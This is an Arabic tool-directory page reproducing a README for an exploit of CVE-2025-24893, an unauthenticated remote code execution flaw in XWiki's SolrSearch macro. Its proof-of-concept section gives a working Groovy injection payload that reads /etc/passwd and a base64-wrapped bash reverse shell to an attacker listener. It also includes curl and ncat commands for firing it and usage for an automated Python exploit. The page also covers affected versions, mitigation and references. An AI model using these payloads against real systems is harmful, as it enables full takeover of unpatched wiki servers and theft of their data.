Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24893-XWiki-unauthenticated-RCE-via-SolrSearch — CVE-2025-24893 هي ثغرة أمنية حرجة لتنفيذ التعليمات البرمجية عن بعد (RCE) غير مصادق عليها في XWiki، وهي منصة ويكي مؤسسية مفتوحة المصدر وشائعة. | Kitploit
أدوات/GitHubGitHub/iiiejlyxakaptoiiiku/cve-2025-24893-xwiki-unauthenticated-rce-via-solrsearch
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubiiiejlyxakaptoiiiku/cve-2025-24893-xwiki-unauthenticated-rce-via-solrsearch

CVE-2025-24893-XWiki-unauthenticated-RCE-via-SolrSearch

CVE-2025-24893 هي ثغرة أمنية حرجة لتنفيذ التعليمات البرمجية عن بعد (RCE) غير مصادق عليها في XWiki، وهي منصة ويكي مؤسسية مفتوحة المصدر وشائعة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

CVE-2025-24893 – تنفيذ تعليمات برمجية عن بُعد غير موثّق في XWiki

0 جدول المحتويات

  1. الملخص
  2. تفاصيل الثغرة
  3. الإصدارات المتأثرة
  4. إثبات المفهوم
    • 4.1 بناء الحمولة
    • 4.2 الاستغلال اليدوي
    • 4.3 استغلال آلي بلغة بايثون
  5. التخفيف
  6. الإسنادات والمراجع

1 الملخص

  • CVE: 2025-24893
  • المكوّن: ماكرو SolrSearch (واجهة XWiki)
  • الخطورة: 9.8 / حرجة (CVSS 3.1)
  • متجه الهجوم: طلب HTTP GET غير موثّق
  • الأثر: تنفيذ تعليمات Groovy عشوائية → تنفيذ أوامر على مستوى النظام (بصلاحيات مستخدم Jetty/Tomcat)

النقطة /xwiki/bin/get/Main/SolrSearch تدمج المدخلات غير الموثوقة text= مباشرة في قالب Freemarker.
عند إغلاق القالب مبكراً وفتح كتلة {{groovy}} … {{/groovy}} جديدة، يمكن للمهاجم تنفيذ تعليمات Groovy عشوائية دون الحاجة إلى مصادقة.


2 تفاصيل الثغرة

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss\&text=<<<USER-DATA>>>  HTTP/1.1

من المفترض أن يقوم SolrSearch بتضمين النص المُرسَل كمحتوى عادي، لكن معالج الماكرو يفشل في إفلات }}}، لذا يحدث الآتي:

  1. }}} يغلق كتلة Freemarker الحالية.
  2. يفتح المهاجم ماكرواً جديداً:
root@kitploit:~
   {{async async=false}}{{groovy}} … {{/groovy}}{{/async}}
  • async=false يُجبر التنفيذ على أن يكون متزامناً (يعمل حتى للضيوف).
  1. يتم تنفيذ Groovy بصلاحيات عملية JVM الخاصة بـ XWiki.

نموذج PoC بسيط يطبع محتوى /etc/passwd:

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("cat /etc/passwd".execute().text){{/groovy}}{{/async}}

الإصدار المُشفّر URL (المسافات → %20، الأقواس → %7B/%7D، إلخ):

root@kitploit:~
%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

3 الإصدارات المتأثرة

الفرعتم الإصلاح فيالمُعرّض للخطر ≤
15.x15.10.1115.10.10 (وجميع إصدارات 15.9 / 15.8 …)

(المصدر: إرشاد OffSec وXWiki SEC-S 2025-02)

endpoint


5 إثبات المفهوم

5.1 بناء الحمولة

root@kitploit:~
RHOST="editor.htb:8080"
LHOST="10.10.14.8"
LPORT=4444

# 1.   أمر واحد لشل عكسي
SHELL="bash -c 'bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1'"

# 2.   Base64 (سطر واحد)
B64=$(echo -n "$SHELL" | base64 -w0)

# 3.   لفها في ماكرو Groovy
RAW='}}}{{async async=false}}{{groovy}}"bash -c {echo,'$B64'}|{base64,-d}|{bash,-i}".execute(){{/groovy}}{{/async}}'

# 4.   تشفير URL
PAYLOAD=$(python3 -c "import urllib.parse,sys;print(urllib.parse.quote(sys.argv[1],safe=''))" "$RAW")

5.2 الاستغلال اليدوي

root@kitploit:~
# بدء المتنصت
sudo ncat -lvnp 4444

# تشغيل الاستغلال
curl "http://$RHOST/xwiki/bin/get/Main/SolrSearch?media=rss&text=${PAYLOAD}"

5.3 الاستغلال الآلي

xwiki_solr_rce.py موجود في exploit/ (انظر كتلة الكود أدناه).

root@kitploit:~
python CVE-2025-24893.py -u <TARGET URL> -l <IP> -p <PORT>

حيث

root@kitploit:~
<TARGET URL> - الرابط شامل http:// أو https://

(مرّر -c "id" لتنفيذ أمر عشوائي بدلاً من الشل) exploit revshell


6 التخفيف

  • الترقية إلى الإصدار 15.10.11 / 14.10.17 أو أحدث
  • حل مؤقت: تعطيل الماكرو
root@kitploit:~
# /etc/xwiki/xwiki.properties
solr.search.enabled = false

7 الإسنادات والمراجع

  • بحث OffSec: “Unauth RCE in XWiki” – 20 فبراير 2025
  • مدخل NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
  • Exploit-DB #52136

البحث وإثبات المفهوم: DeX1d


إخلاء مسؤولية: للاستخدام التعليمي فقط. تشغيل هذا ضد أنظمة لا تملكها غير قانوني.

تنزيل الأداة
14.x LTS14.10.1714.10.16
13 / 12غير مدعومة – جميعها لا تزال مُعرّضة للخطر